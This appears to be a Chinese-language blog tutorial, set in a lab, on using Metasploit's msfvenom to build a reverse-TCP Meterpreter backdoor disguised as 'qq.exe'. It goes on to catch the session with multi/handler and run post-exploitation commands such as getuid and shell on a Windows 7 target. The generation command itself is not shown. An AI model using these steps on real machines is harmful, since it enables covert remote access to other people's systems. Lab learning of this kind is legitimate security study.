msf生成后門拿shell


 

0X01簡介 這里我本來想學習 msf利用漏洞反彈shell的 但是 沒有靶機....等找了靶機在弄吧

kali 172.18.5.118

靶機  172.18.5.240

先嘗試能不能ping通

好的可以 那我們進行下一步

0X01愛之初體驗

先在kali終端輸入msfvenom -l,打開payload目錄

然后找到payload windows/meterpreter/reverse_tcp

輸入以下命令生成后門qq.exe

 

 然后將生成的qq.exe移到靶機然后打開msfconsole

 使用該攻擊模塊監聽 use exploit/multi/handler

然后設置payload

 

 

 在show options 發現還有未設置的

設置LHOSTkali地址

然后run開始監聽

 

 

這時我們打開靶機qq.exe文件就能看到Kali這邊獲取到一個Session

輸入jobs退出繼續輸入sessions -l查看session列表

這里有一個session列表,sessionid1

我們輸入sessions -i 1,與該session交互

輸入getuid查看用戶信息

輸入systinfo獲取系統信息

輸入shell即可獲取win7shell

不過用這樣方式拿的shell普遍都是很低的,還需提權

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM